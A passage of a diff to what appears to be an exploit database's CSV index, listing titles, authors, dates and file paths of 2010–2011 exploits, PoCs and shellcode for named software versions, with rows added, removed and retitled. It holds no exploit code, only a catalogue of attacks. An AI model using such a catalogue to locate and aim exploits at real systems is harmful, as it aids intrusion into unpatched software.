Disclosure",2010-11-24,"Michael Brooks",php,webapps,0 -15607,platforms/php/webapps/15607.txt,"WSN Links SQL Injection Vulnerability",2010-11-24,"Mark Stanislav",php,webapps,0 -15608,platforms/php/webapps/15608.txt,"Free Simple Software SQL Injection Vulnerability",2010-11-24,"Mark Stanislav",php,webapps,0 -15609,platforms/windows/local/15609.txt,"Windows Vista/7 - Elevation of Privileges (UAC Bypass) (0day)",2010-11-24,noobpwnftw,windows,local,0 -15610,platforms/php/webapps/15610.txt,"Joomla JE Ajax Event Calendar Component (com_jeajaxeventcalendar) SQL Injection",2010-11-25,"ALTBTA ",php,webapps,0 +15614,platforms/php/webapps/15614.html,"Wolf CMS 0.6.0b - Multiple Vulnerabilities",2010-11-25,"High-Tech Bridge SA",php,webapps,0 15611,platforms/multiple/webapps/15611.txt,"JDownloader Webinterface Source Code Disclosure Vulnerability",2010-11-25,Sil3nt_Dre4m,multiple,webapps,0 15612,platforms/php/webapps/15612.txt,"SiteEngine <= 7.1 - SQL Injection Vulnerability",2010-11-25,Beach,php,webapps,0 15613,platforms/windows/dos/15613.py,"NCH Officeintercom <= 5.20 - Remote Denial of Service Vulnerability",2010-11-25,"xsploited security",windows,dos,0 -15614,platforms/php/webapps/15614.html,"Wolf CMS 0.6.0b - Multiple Vulnerabilities",2010-11-25,"High-Tech Bridge SA",php,webapps,0 15615,platforms/php/webapps/15615.html,"frog CMS 0.9.5 - Multiple Vulnerabilities",2010-11-25,"High-Tech Bridge SA",php,webapps,0 15616,platforms/arm/shellcode/15616.c,"Linux/ARM - add root user with password - 151 bytes",2010-11-25,"Jonathan Salwan",arm,shellcode,0 15617,platforms/multiple/remote/15617.txt,"VMware 2 Web Server - Directory Traversal",2010-11-25,clshack,multiple,remote,0 @@ -13530,7 +13562,7 @@ id,file,description,date,author,platform,type,port 15626,platforms/windows/local/15626.py,"OTSTurntables 1.00.048 - (m3u/ofl) Local BoF Exploit (SEH)",2010-11-28,0v3r,windows,local,0 15627,platforms/asp/webapps/15627.html,"Site2Nite Big Truck Broker ""txtSiteId"" SQL Injection Vulnerability",2010-11-28,underground-stockholm.com,asp,webapps,0 15628,platforms/windows/dos/15628.py,"Hanso Player 1.4.0 - (.m3u) Denial of Service Vulnerability",2010-11-28,anT!-Tr0J4n,windows,dos,0 -15629,platforms/asp/webapps/15629.txt,"MicroNetSoft RV Dealer Website search.asp, showAlllistings.asp SQL Injection",2010-11-29,underground-stockholm.com,asp,webapps,0 +15629,platforms/asp/webapps/15629.txt,"MicroNetSoft RV Dealer Website search.asp & showAlllistings.asp - SQL Injection",2010-11-29,underground-stockholm.com,asp,webapps,0 15630,platforms/windows/local/15630.py,"Mediacoder 0.7.5.4792 - Buffer Overflow Exploit (SEH)",2010-11-29,0v3r,windows,local,0 15631,platforms/hardware/remote/15631.txt,"HP LaserJet Directory Traversal in PJL Interface",2010-11-29,"n.runs AG",hardware,remote,0 15632,platforms/windows/dos/15632.py,"FoxPlayer 2.4.0 - Denial of Service",2010-11-29,"Oh Yaw Theng",windows,dos,0 @@ -13542,6 +13574,7 @@ id,file,description,date,author,platform,type,port 15639,platforms/php/webapps/15639.txt,"Pandora Fms <= 3.1 - Authentication Bypass",2010-11-30,"Juan Galiana Lara",php,webapps,0 15640,platforms/php/webapps/15640.txt,"Pandora Fms <= 3.1 OS Command Injection",2010-11-30,"Juan Galiana Lara",php,webapps,0 15641,platforms/php/webapps/15641.txt,"Pandora Fms <= 3.1 - SQL Injection",2010-11-30,"Juan Galiana Lara",php,webapps,0 +16012,platforms/windows/dos/16012.html,"Google Chrome 8.0.552.237 - address Overflow DoS",2011-01-18,"Vuk Ivanovic",windows,dos,0 15642,platforms/php/webapps/15642.txt,"Pandora Fms <= 3.1 - Blind SQL Injection",2010-11-30,"Juan Galiana Lara",php,webapps,0 15643,platforms/php/webapps/15643.txt,"Pandora Fms <= 3.1 Path Traversal and LFI",2010-11-30,"Juan Galiana Lara",php,webapps,0 15644,platforms/php/webapps/15644.txt,"Eclime 1.1.2b - Multiple Vulnerabilities",2010-11-30,"High-Tech Bridge SA",php,webapps,0 @@ -13597,31 +13630,34 @@ id,file,description,date,author,platform,type,port 15697,platforms/windows/dos/15697.html,"AVG Internet Security 2011 Safe Search for IE DoS",2010-12-06,Dr_IDE,windows,dos,0 15698,platforms/windows/dos/15698.html,"Flash Player (Flash6.ocx) AllowScriptAccess DoS PoC",2010-12-06,Dr_IDE,windows,dos,0 15699,platforms/php/webapps/15699.txt,"PhpMyAdmin - Client Side Code Injection and Redirect Link Falsification (0day)",2010-12-06,"emgent white_sheep and scox",php,webapps,80 +15704,platforms/linux/local/15704.c,"Linux Kernel <= 2.6.37 - Local Privilege Escalation",2010-12-07,"Dan Rosenberg",linux,local,0 +33671,platforms/php/webapps/33671.txt,"MySmartBB 1.7 - Multiple Cross-Site Scripting Vulnerabilities",2010-02-24,indoushka,php,webapps,0 15701,platforms/php/webapps/15701.txt,"MODx Revolution CMS 2.0.4-pl2 - Remote XSS POST Injection Vulnerability",2010-12-06,LiquidWorm,php,webapps,0 15703,platforms/asp/webapps/15703.txt,"SOOP Portal Raven 1.0b Shell Upload Vulnerability",2010-12-07,"Sun Army",asp,webapps,0 -15704,platforms/linux/local/15704.c,"Linux Kernel <= 2.6.37 - Local Privilege Escalation",2010-12-07,"Dan Rosenberg",linux,local,0 15705,platforms/linux/dos/15705.txt,"GNU inetutils 1.8-1 - FTP Client Heap Overflow",2010-12-07,Rew,linux,dos,0 15706,platforms/windows/local/15706.txt,"Winamp 5.6 - Arbitrary Code Execution in MIDI Parser",2010-12-08,"Kryptos Logic",windows,local,0 15707,platforms/multiple/dos/15707.txt,"Wonderware InBatch <= 9.0sp1 - Buffer Overflow Vulnerability",2010-12-08,"Luigi Auriemma",multiple,dos,0 15708,platforms/windows/dos/15708.html,"Internet Explorer 8 CSS Parser Denial of Service",2010-12-08,WooYun,windows,dos,0 +15744,platforms/cgi/webapps/15744.txt,"Gitweb <= 1.7.3.3 - Cross-Site Scripting",2010-12-15,emgent,cgi,webapps,80 +15745,platforms/linux/local/15745.txt,"IBM Tivoli Storage Manager (TSM) Local Root",2010-12-15,"Kryptos Logic",linux,local,0 15710,platforms/multiple/webapps/15710.txt,"Apache Archiva 1.0 - 1.3.1 - CSRF Vulnerability",2010-12-09,"Anatolia Security",multiple,webapps,0 15711,platforms/php/webapps/15711.pl,"Abtp Portal Project 0.1.0 - LFI Exploit",2010-12-09,Br0ly,php,webapps,0 15712,platforms/arm/shellcode/15712.rb,"Create a New User with UID 0 - ARM (Meta)",2010-12-09,"Jonathan Salwan",arm,shellcode,0 +15717,platforms/multiple/remote/15717.txt,"VMware Tools update OS Command Injection",2010-12-09,"Nahuel Grisolia",multiple,remote,0 15714,platforms/php/webapps/15714.txt,"Joomla JE Auto Component 1.0 - SQL Injection Vulnerability",2010-12-09,"Salvatore Fresta",php,webapps,0 15715,platforms/php/webapps/15715.txt,"CMScout 2.09 - CSRF Vulnerability",2010-12-09,"High-Tech Bridge SA",php,webapps,0 -15717,platforms/multiple/remote/15717.txt,"VMware Tools update OS Command Injection",2010-12-09,"Nahuel Grisolia",multiple,remote,0 +15720,platforms/php/webapps/15720.txt,"Sulata iSoft (stream.php) Local File Disclosure Exploit",2010-12-10,Sudden_death,php,webapps,0 15718,platforms/php/webapps/15718.txt,"AJ Matrix DNA SQL Injection",2010-12-09,Br0ly,php,webapps,0 15719,platforms/php/webapps/15719.txt,"JE Messenger 1.0 - Arbitrary File Upload Vulnerability",2010-12-09,"Salvatore Fresta",php,webapps,0 -15720,platforms/php/webapps/15720.txt,"Sulata iSoft (stream.php) Local File Disclosure Exploit",2010-12-10,Sudden_death,php,webapps,0 15721,platforms/php/webapps/15721.txt,"Joomla Component Billy Portfolio 1.1.2 - Blind SQL Injection",2010-12-10,jdc,php,webapps,0 15722,platforms/multiple/dos/15722.txt,"PHP 5.3.3 NumberFormatter::getSymbol Integer Overflow",2010-12-10,"Maksymilian Arciemowicz",multiple,dos,0 15723,platforms/freebsd/remote/15723.c,"FreeBSD LiteSpeed Web Server 4.0.17 with PHP - Remote Exploit",2010-12-10,kingcope,freebsd,remote,0 +15803,platforms/windows/dos/15803.py,"Windows 7 IIS7.5 FTPSVC UNAUTH'D Remote DoS PoC",2010-12-21,"Matthew Bergin",windows,dos,0 15725,platforms/linux/remote/15725.pl,"Exim 4.63 - Remote Root Exploit",2010-12-11,kingcope,linux,remote,0 15727,platforms/windows/local/15727.py,"FreeAmp 2.0.7 - (.m3u) Buffer Overflow",2010-12-11,zota,windows,local,0 15728,platforms/hardware/webapps/15728.txt,"Clear iSpot/Clearspot 2.0.0.0 - CSRF Vulnerabilities",2010-12-12,"Trustwave's SpiderLabs",hardware,webapps,0 15729,platforms/windows/local/15729.py,"PowerShell XP 3.0.1 - Buffer Overflow (0day)",2010-12-12,m_101,windows,local,0 15730,platforms/windows/local/15730.rb,"SnackAmp 3.1.3 - SMP Buffer Overflow Vulnerability (SEH)",2010-12-12,"James Fitts",windows,local,0 -15732,platforms/linux/dos/15732.txt,"FontForge .BDF Font File Stack-Based Buffer Overflow",2010-12-14,"Ulrik Persson",linux,dos,0 15733,platforms/windows/remote/15733.html,"Crystal Reports Viewer 12.0.0.549 - ActiveX Exploit (PrintControl.dll) (0day)",2010-12-14,Dr_IDE,windows,remote,0 15735,platforms/php/webapps/15735.txt,"MantisBT <= 1.2.3 (db_type) - Cross-Site Scripting & Path Disclosure Vulnerability",2010-12-15,LiquidWorm,php,webapps,0 15736,platforms/php/webapps/15736.txt,"MantisBT <= 1.2.3 (db_type) - Local File Inclusion Vulnerability",2010-12-15,LiquidWorm,php,webapps,0 @@ -13632,8 +13668,6 @@ id,file,description,date,author,platform,type,port 15741,platforms/php/webapps/15741.txt,"Pointter PHP Micro-Blogging Social Network Unauthorized Privilege Escalation",2010-12-15,"Mark Stanislav",php,webapps,0 15742,platforms/php/webapps/15742.txt,"BEdita 3.0.1.2550 - Multiple Vulnerabilities",2010-12-15,"High-Tech Bridge SA",php,webapps,0 15743,platforms/php/webapps/15743.txt,"BLOG:CMS <= 4.2.1e - Multiple Vulnerabilities",2010-12-15,"High-Tech Bridge SA",php,webapps,0 -15744,platforms/cgi/webapps/15744.txt,"Gitweb <= 1.7.3.3 - Cross-Site Scripting",2010-12-15,emgent,cgi,webapps,80 -15745,platforms/linux/local/15745.txt,"IBM Tivoli Storage Manager (TSM) Local Root",2010-12-15,"Kryptos Logic",linux,local,0 15746,platforms/windows/remote/15746.rb,"Internet Explorer 8 CSS Parser Exploit",2010-12-15,"Nephi Johnson",windows,remote,0 15747,platforms/windows/local/15747.py,"Aesop GIF Creator <= 2.1 - (.aep) Buffer Overflow Exploit",2010-12-16,xsploitedsec,windows,local,0 15748,platforms/php/webapps/15748.txt,"QualDev eCommerce script SQL Injection Vulnerability",2010-12-16,ErrNick,php,webapps,0 @@ -13646,12 +13680,12 @@ id,file,description,date,author,platform,type,port 15755,platforms/php/webapps/15755.txt,"Easy Online Shop SQL Injection Vulnerability",2010-12-17,"Easy Laster",php,webapps,0 15756,platforms/php/webapps/15756.txt,"MHP Downloadshop SQL Injection Vulnerability",2010-12-17,"Easy Laster",php,webapps,0 15758,platforms/win32/dos/15758.c,"Windows Win32k Pointer Dereferencement PoC (MS10-098)",2010-12-17,"Stefan LE BERRE",win32,dos,0 +15766,platforms/php/webapps/15766.txt,"Radius Manager 3.8.0 - Multiple XSS Vulnerabilities",2010-12-17,"Rodrigo Rubira Branco",php,webapps,0 15761,platforms/windows/local/15761.txt,"AhnLab V3 Internet Security 8.0 <= 1.2.0.4 - Privilege Escalation Vulnerability",2010-12-17,MJ0011,windows,local,0 15762,platforms/windows/local/15762.txt,"NProtect Anti-Virus 2007 <= 2010.5.11.1 - Privilege Escalation Vulnerability",2010-12-17,MJ0011,windows,local,0 15763,platforms/windows/local/15763.txt,"ESTsoft ALYac Anti-Virus 1.5 <= 5.0.1.2 - Privilege Escalation Vulnerability",2010-12-17,MJ0011,windows,local,0 15764,platforms/windows/local/15764.txt,"ViRobot Desktop 5.5 and Server 3.5 <= 2008.8.1.1 - Privilege Escalation Vulnerability",2010-12-17,MJ0011,windows,local,0 15765,platforms/php/webapps/15765.txt,"CubeCart 3.x - Remote File Upload Vulnerability",2010-12-17,StunTMaN!,php,webapps,0 -15766,platforms/php/webapps/15766.txt,"Radius Manager 3.8.0 - Multiple XSS Vulnerabilities",2010-12-17,"Rodrigo Rubira Branco",php,webapps,0 15767,platforms/windows/dos/15767.py,"Ecava IntegraXor Remote ActiveX Buffer Overflow PoC",2010-12-18,"Jeremy Brown",windows,dos,0 15768,platforms/php/webapps/15768.txt,"MCFileManager Plugin for TinyMCE 3.2.2.3 - Arbitrary File Upload Vulnerability",2010-12-18,"Vladimir Vorontsov",php,webapps,0 15769,platforms/php/webapps/15769.txt,"Ero Auktion 2010 - (item.php) SQL Injection Vulnerability",2010-12-18,"DeadLy DeMon",php,webapps,0 @@ -13686,9 +13720,8 @@ id,file,description,date,author,platform,type,port 15800,platforms/php/webapps/15800.txt,"html-edit CMS - Multiple Vulnerabilities",2010-12-21,"High-Tech Bridge SA",php,webapps,0 15801,platforms/php/webapps/15801.txt,"Joomla Component com_xgallery 1.0 - Local File Inclusion Vulnerability",2010-12-21,KelvinX,php,webapps,0 15802,platforms/windows/remote/15802.txt,"ecava integraxor 3.6.4000.0 - Directory Traversal",2010-12-21,"Luigi Auriemma",windows,remote,0 -15803,platforms/windows/dos/15803.py,"Windows 7 IIS7.5 FTPSVC UNAUTH'D Remote DoS PoC",2010-12-21,"Matthew Bergin",windows,dos,0 -15804,platforms/php/webapps/15804.txt,"jobappr <= 1.4 - Multiple Vulnerabilities",2010-12-21,giudinvx,php,webapps,0 15805,platforms/hardware/dos/15805.php,"Apple iPhone Safari (JS .) Remote Crash",2010-12-22,"Yakir Wizman",hardware,dos,0 +15804,platforms/php/webapps/15804.txt,"jobappr <= 1.4 - Multiple Vulnerabilities",2010-12-21,giudinvx,php,webapps,0 15806,platforms/linux/remote/15806.txt,"Citrix Access Gateway - Command Injection Vulnerability",2010-12-22,"George D. Gal",linux,remote,0 15807,platforms/cgi/webapps/15807.txt,"Mitel AWC Unauthenticated Command Execution",2010-12-22,Procheckup,cgi,webapps,0 15808,platforms/php/webapps/15808.txt,"WORDPRESS Plugin Accept Signups 0.1 - XSS",2010-12-22,clshack,php,webapps,0 @@ -13710,6 +13743,7 @@ id,file,description,date,author,platform,type,port 15826,platforms/php/webapps/15826.txt,"Traidnt Up 3.0 - CSRF Vulnerability",2010-12-25,"P0C T34M",php,webapps,0 15827,platforms/php/webapps/15827.txt,"Joomla Component (com_idoblog) SQL Injection Vulnerability",2010-12-25,NOCKAR1111,php,webapps,0 15828,platforms/php/webapps/15828.txt,"Vacation Rental Script 4.0 - CSRF Vulnerability",2010-12-25,OnurTURKESHAN,php,webapps,0 +15838,platforms/php/webapps/15838.php,"OpenClassifieds 1.7.0.3 - Chained: Captcha Bypass / SQLi / Persistent XSS on Frontpage",2010-12-28,"Michael Brooks",php,webapps,0 15830,platforms/php/webapps/15830.txt,"Social Engine 4.x (Music Plugin) Arbitrary File Upload Vulnerability",2010-12-25,MyDoom,php,webapps,0 15831,platforms/php/webapps/15831.txt,"LoveCMS 1.6.2 Final Multiple Local File Inclusion Vulnerabilities",2010-12-25,cOndemned,php,webapps,0 15832,platforms/php/webapps/15832.txt,"Interact 2.4.1 - SQL Injection Vulnerability",2010-12-26,"IR Security",php,webapps,0 @@ -13717,24 +13751,23 @@ id,file,description,date,author,platform,type,port 15835,platforms/php/webapps/15835.html,"pecio CMS 2.0.5 - CSRF Add Admin",2010-12-27,"P0C T34M",php,webapps,0 15836,platforms/php/webapps/15836.txt,"OpenEMR 3.2.0 - SQL Injection and XSS",2010-12-27,blake,php,webapps,0 15837,platforms/php/webapps/15837.txt,"Web@all <= 1.1 - Remote Admin Settings Change",2010-12-27,"Giuseppe D'Inverno",php,webapps,0 -15838,platforms/php/webapps/15838.php,"OpenClassifieds 1.7.0.3 - Chained: Captcha Bypass / SQLi / Persistent XSS on Frontpage",2010-12-28,"Michael Brooks",php,webapps,0 15839,platforms/windows/dos/15839.php,"Microsoft Windows Fax Services Cover Page Editor (.cov) Memory Corruption",2010-12-28,rgod,windows,dos,0 15840,platforms/php/webapps/15840.txt,"ardeaCore 2.25 - PHP Framework Remote File Inclusion",2010-12-29,n0n0x,php,webapps,0 15842,platforms/hardware/remote/15842.txt,"DD-WRT 24-preSP2 - Information Disclosure Vulnerability",2010-12-29,"Craig Heffner",hardware,remote,0 15843,platforms/php/webapps/15843.txt,"News Script PHP Pro - (fckeditor) File Upload Vulnerability",2010-12-29,Net.Edit0r,php,webapps,0 -15845,platforms/windows/dos/15845.py,"IrfanView 4.27 - JP2000.dll plugin DoS",2010-12-29,BraniX,windows,dos,0 15846,platforms/php/webapps/15846.txt,"kaibb 1.0.1 - Multiple Vulnerabilities",2010-12-29,"High-Tech Bridge SA",php,webapps,0 15847,platforms/php/webapps/15847.txt,"DzTube SQL Injection Vulnerability",2010-12-29,"errnick qwe",php,webapps,0 15848,platforms/php/webapps/15848.txt,"PHP-AddressBook 6.2.4 - (group.php) SQL Injection Vulnerability",2010-12-29,hiphop,php,webapps,0 +15845,platforms/windows/dos/15845.py,"IrfanView 4.27 - JP2000.dll plugin DoS",2010-12-29,BraniX,windows,dos,0 15849,platforms/php/webapps/15849.txt,"LoveCMS 1.6.2 - CSRF Code Injection Vulnerability",2010-12-29,hiphop,php,webapps,0 15850,platforms/php/webapps/15850.html,"PiXie CMS <= 1.04 - Multiple CSRF Vulnerabilities",2010-12-29,"Ali Raheem",php,webapps,0 15851,platforms/windows/dos/15851.py,"QuickTime Picture Viewer 7.6.6 JP2000 - Denial of Service Vulnerability",2010-12-29,BraniX,windows,dos,0 15852,platforms/php/webapps/15852.txt,"Siteframe 3.2.3 (user.php) SQL Injection Vulnerability",2010-12-29,"AnGrY BoY",php,webapps,0 15853,platforms/php/webapps/15853.txt,"DGNews 2.1 - SQL Injection Vulnerability",2010-12-29,kalashnikov,php,webapps,0 -15855,platforms/windows/local/15855.py,"Digital Music Pad 8.2.3.4.8 - (.pls) SEH Overflow",2010-12-29,"Abhishek Lyall",windows,local,0 15856,platforms/php/webapps/15856.php,"TYPO3 Unauthenticated Arbitrary File Retrieval",2010-12-29,ikki,php,webapps,0 +15855,platforms/windows/local/15855.py,"Digital Music Pad 8.2.3.4.8 - (.pls) SEH Overflow",2010-12-29,"Abhishek Lyall",windows,local,0 15857,platforms/php/webapps/15857.txt,"Discovery TorrentTrader 2.6 - Multiple Vulnerabilities",2010-12-29,EsS4ndre,php,webapps,0 -15858,platforms/php/webapps/15858.txt,"wordpress 3.0.3 - Stored XSS (ie7,6 ns8.1)",2010-12-29,Saif,php,webapps,0 +15858,platforms/php/webapps/15858.txt,"wordpress 3.0.3 - Stored XSS (IE6/7 NS8.1)",2010-12-29,Saif,php,webapps,0 15860,platforms/windows/dos/15860.py,"TYPSoft FTP Server (v 1.10) RETR CMD Denial of Service",2010-12-29,emgent,windows,dos,0 15861,platforms/windows/remote/15861.txt,"httpdasm 0.92 - Directory Traversal",2010-12-29,"John Leitch",windows,remote,0 15862,platforms/windows/remote/15862.txt,"quickphp Web server 1.9.1 - Directory Traversal",2010-12-29,"John Leitch",windows,remote,0 @@ -13742,11 +13775,13 @@ id,file,description,date,author,platform,type,port 15864,platforms/php/webapps/15864.txt,"Ignition 1.3 (page.php) Local File Inclusion Vulnerability",2010-12-30,cOndemned,php,webapps,0 15865,platforms/php/webapps/15865.php,"Ignition 1.3 - Remote Code Execution Exploit",2010-12-30,cOndemned,php,webapps,0 15866,platforms/windows/remote/15866.html,"Chilkat Software FTP2 - ActiveX Component Remote Code Execution",2010-12-30,rgod,windows,remote,0 +15915,platforms/php/webapps/15915.py,"Concrete CMS 5.4.1.1 - XSS/Remote Code Execution Exploit",2011-01-05,mr_me,php,webapps,0 15868,platforms/windows/remote/15868.pl,"QuickPHP Web Server Arbitrary (src .php) File Download",2010-12-30,"Yakir Wizman",windows,remote,0 15869,platforms/windows/remote/15869.txt,"CA ARCserve D2D r15 Web Service Servlet Code Execution",2010-12-30,rgod,windows,remote,0 15879,platforms/windows/shellcode/15879.txt,w32-speaking-shellcode,2010-12-31,Skylined,windows,shellcode,0 15885,platforms/windows/remote/15885.html,"HP Photo Creative 2.x audio.Record.1 - ActiveX Control Remote Stack Based Buffer Overflow",2011-01-01,rgod,windows,remote,0 15886,platforms/php/webapps/15886.txt,"KLINK SQL Injection Vulnerability",2011-01-01,"Mauro Rossi and Andres Gomez",php,webapps,0 +15895,platforms/windows/local/15895.py,"CoolPlayer 2.18 - DEP Bypass",2011-01-02,blake,windows,local,0 15887,platforms/php/webapps/15887.txt,"ChurchInfo <= 1.2.12 SQL Injection Vulnerability",2011-01-01,dun,php,webapps,0 15888,platforms/windows/local/15888.c,"Bywifi 2.8.1 - Stack Buffer Overflow Exploit",2011-01-01,anonymous,windows,local,0 15889,platforms/php/webapps/15889.txt,"Sahana Agasti <= 0.6.4 - SQL Injection Vulnerability",2011-01-01,dun,php,webapps,0 @@ -13755,26 +13790,27 @@ id,file,description,date,author,platform,type,port 15892,platforms/php/webapps/15892.html,"YourTube 1.0 - CSRF Vulnerability (Add User)",2011-01-02,"AtT4CKxT3rR0r1ST ",php,webapps,0 15893,platforms/php/webapps/15893.py,"amoeba CMS 1.01 - Multiple Vulnerabilities",2011-01-02,mr_me,php,webapps,0 15894,platforms/windows/dos/15894.c,"Windows Class Handling Vulnerability (MS10-073)",2011-01-02,"Tarjei Mandt",windows,dos,0 -15895,platforms/windows/local/15895.py,"CoolPlayer 2.18 - DEP Bypass",2011-01-02,blake,windows,local,0 +18245,platforms/multiple/remote/18245.py,"Splunk Remote Root Exploit",2011-12-15,"Gary O'Leary-Steele",multiple,remote,0 15896,platforms/php/webapps/15896.txt,"Sahana Agasti <= 0.6.4 - Multiple Remote File Inclusion",2011-01-03,n0n0x,php,webapps,0 15897,platforms/windows/dos/15897.py,"Music Animation Machine MIDI Player Local Crash PoC",2011-01-03,c0d3R'Z,windows,dos,0 15898,platforms/multiple/dos/15898.py,"Wireshark ENTTEC DMX Data RLE Buffer Overflow Vulnerability",2011-01-03,"non-customers crew",multiple,dos,0 -15901,platforms/windows/local/15901.py,"Music Animation Machine MIDI Player SEH BOF",2011-01-04,Acidgen,windows,local,0 15902,platforms/php/webapps/15902.html,"S40 CMS 0.4.1 Change Admin Passwd CSRF Exploit",2011-01-04,pentesters.ir,php,webapps,0 +15901,platforms/windows/local/15901.py,"Music Animation Machine MIDI Player SEH BOF",2011-01-04,Acidgen,windows,local,0 15905,platforms/windows/dos/15905.py,"Xynph 1.0 USER Denial of Service Exploit",2011-01-04,freak_out,windows,dos,0 +15991,platforms/windows/remote/15991.html,"Real Networks RealPlayer SP 'RecordClip' Method Remote Code Execution",2011-01-14,"Sean de Regge",windows,remote,0 15907,platforms/php/webapps/15907.txt,"Nucleus 3.61 - Multiple Remote File Include",2011-01-05,n0n0x,php,webapps,0 15913,platforms/php/webapps/15913.pl,"PhpGedView <= 4.2.3 - Local File Inclusion Vulnerability",2011-01-05,dun,php,webapps,0 -15915,platforms/php/webapps/15915.py,"Concrete CMS 5.4.1.1 - XSS/Remote Code Execution Exploit",2011-01-05,mr_me,php,webapps,0 -15916,platforms/linux/local/15916.c,"Linux Kernel 2.6.34 - CAP_SYS_ADMIN x86 - Local Privilege Escalation Exploit",2011-01-05,"Dan Rosenberg",linux,local,0 -15917,platforms/php/webapps/15917.txt,"Ignition 1.3 (comment.php) Local File Inclusion Vulnerability",2011-01-06,n0n0x,php,webapps,0 +15961,platforms/php/webapps/15961.txt,"TinyBB 1.2 - SQL Injection Vulnerability",2011-01-10,Aodrulez,php,webapps,0 15918,platforms/jsp/webapps/15918.txt,"Openfire 3.6.4 - Multiple CSRF Vulnerabilities",2011-01-06,"Riyaz Ahemed Walikar",jsp,webapps,0 +15916,platforms/linux/local/15916.c,"Linux Kernel 2.6.34 - CAP_SYS_ADMIN x86 - Local Privilege Escalation Exploit",2011-01-05,"Dan Rosenberg",linux,local,0 15919,platforms/windows/local/15919.pl,"Enzip 3.00 - Buffer Overflow Exploit",2011-01-06,"C4SS!0 G0M3S",windows,local,0 -15920,platforms/php/webapps/15920.txt,"F3Site 2011 alfa 1 - Multiple Vulnerabilities (xss, csrf)",2011-01-06,"High-Tech Bridge SA",php,webapps,0 -15921,platforms/php/webapps/15921.txt,"phpMySport 1.4 - Multiple Vulnerabilities (SQLi, Auth Bypass, Path Disclosure)",2011-01-06,"High-Tech Bridge SA",php,webapps,0 +15920,platforms/php/webapps/15920.txt,"F3Site 2011 alfa 1 - Multiple Vulnerabilities (XSS & CSRF)",2011-01-06,"High-Tech Bridge SA",php,webapps,0 +15921,platforms/php/webapps/15921.txt,"phpMySport 1.4 - Multiple Vulnerabilities (SQLi & Auth Bypass & Path Disclosure)",2011-01-06,"High-Tech Bridge SA",php,webapps,0 15922,platforms/php/webapps/15922.txt,"Phenotype CMS 3.0 - SQL Injection",2011-01-06,"High-Tech Bridge SA",php,webapps,0 15923,platforms/php/webapps/15923.txt,"PHP MicroCMS 1.0.1 - CSRF and XSS Vulnerabilities",2011-01-06,"High-Tech Bridge SA",php,webapps,0 15924,platforms/php/webapps/15924.txt,"openSite 0.2.2 beta - Local File Inclusion Vulnerbility",2011-01-07,n0n0x,php,webapps,0 15925,platforms/windows/dos/15925.txt,"StageTracker 2.5 - Denial of Service Vulnerability",2011-01-07,freak_out,windows,dos,0 +15957,platforms/windows/remote/15957.py,"KingView 6.5.3 SCADA HMI Heap Overflow PoC",2011-01-09,"Dillon Beresford",windows,remote,0 15934,platforms/windows/local/15934.py,"BS.Player 2.57 - Buffer Overflow Exploit (Unicode SEH)",2011-01-07,"C4SS!0 G0M3S",windows,local,0 15935,platforms/linux/dos/15935.c,"GNU libc/regcomp(3) Multiple Vulnerabilities",2011-01-07,"Maksymilian Arciemowicz",linux,dos,0 15936,platforms/windows/local/15936.py,"VideoSpirit Pro <= 1.68 - Local BoF Exploit",2011-01-08,xsploitedsec,windows,local,0 @@ -13787,34 +13823,34 @@ id,file,description,date,author,platform,type,port 15943,platforms/php/webapps/15943.txt,"mingle forum (wordpress plugin) <= 1.0.26 - Multiple Vulnerabilities",2011-01-08,"Charles Hooper",php,webapps,0 15944,platforms/linux/local/15944.c,"Linux Kernel < 2.6.34 - CAP_SYS_ADMIN x86 & x64 - Local Privilege Escalation Exploit (2)",2011-01-08,"Joe Sylve",linux,local,0 15945,platforms/php/webapps/15945.txt,"Zwii 2.1.1 - Remote File Inclusion Vulnerbility",2011-01-08,"Abdi Mohamed",php,webapps,0 +16123,platforms/hardware/remote/16123.txt,"Comcast DOCSIS 3.0 Business Gateways Multiple Vulnerabilities",2011-02-06,"Trustwave's SpiderLabs",hardware,remote,0 15946,platforms/windows/dos/15946.py,"IrfanView 4.28 - Multiple Denial of Service Vulnerabilities",2011-01-09,BraniX,windows,dos,0 -15957,platforms/windows/remote/15957.py,"KingView 6.5.3 SCADA HMI Heap Overflow PoC",2011-01-09,"Dillon Beresford",windows,remote,0 15958,platforms/php/webapps/15958.txt,"Joomla Captcha Plugin <= 4.5.1 - Local File Disclosure Vulnerability",2011-01-09,dun,php,webapps,0 15959,platforms/windows/dos/15959.pl,"Macro Express Pro 4.2.2.1 MXE File Syntactic Analysis Buffer Overflow PoC",2011-01-10,LiquidWorm,windows,dos,0 15960,platforms/php/webapps/15960.txt,"Maximus CMS (fckeditor) Arbitrary File Upload Vulnerability",2011-01-10,eidelweiss,php,webapps,0 -15961,platforms/php/webapps/15961.txt,"TinyBB 1.2 - SQL Injection Vulnerability",2011-01-10,Aodrulez,php,webapps,0 15962,platforms/solaris/local/15962.c,"Linux Kernel - Solaris < 5.10 138888-01 - Local Root Exploit",2011-01-10,peri.carding,solaris,local,0 15963,platforms/windows/remote/15963.rb,"Windows Common Control Library (Comctl32) - Heap Overflow (MS10-081)",2011-01-10,"Nephi Johnson",windows,remote,0 15964,platforms/php/webapps/15964.py,"Lotus CMS Fraise 3.0 - LFI - Remote Code Execution Exploit",2011-01-10,mr_me,php,webapps,0 -15966,platforms/php/webapps/15966.txt,"ExtCalendar 2 (calendar.php) SQL Injection Vulnerability",2011-01-11,"Lagripe-Dz and Mca-Crb",php,webapps,0 -15967,platforms/php/webapps/15967.txt,"energine 2.3.8 - Multiple Vulnerabilities",2011-01-11,"High-Tech Bridge SA",php,webapps,0 15968,platforms/php/webapps/15968.txt,"vam shop 1.6 - Multiple Vulnerabilities",2011-01-11,"High-Tech Bridge SA",php,webapps,0 15969,platforms/php/webapps/15969.txt,"diafan.cms 4.3 - Multiple Vulnerabilities",2011-01-11,"High-Tech Bridge SA",php,webapps,0 15970,platforms/php/webapps/15970.txt,"Cambio 0.5a CSRF Vulnerabiliity",2011-01-11,"High-Tech Bridge SA",php,webapps,0 +15966,platforms/php/webapps/15966.txt,"ExtCalendar 2 (calendar.php) SQL Injection Vulnerability",2011-01-11,"Lagripe-Dz and Mca-Crb",php,webapps,0 +15967,platforms/php/webapps/15967.txt,"energine 2.3.8 - Multiple Vulnerabilities",2011-01-11,"High-Tech Bridge SA",php,webapps,0 15971,platforms/php/webapps/15971.txt,"whCMS 0.115 - CSRF Vulnerability",2011-01-11,"High-Tech Bridge SA",php,webapps,0 15972,platforms/windows/local/15972.c,"DriveCrypt <= 5.3 - Local Kernel ring0 SYSTEM Exploit",2011-01-11,mu-b,windows,local,0 15973,platforms/multiple/dos/15973.txt,"Wireshark ZigBee ZCL Dissector 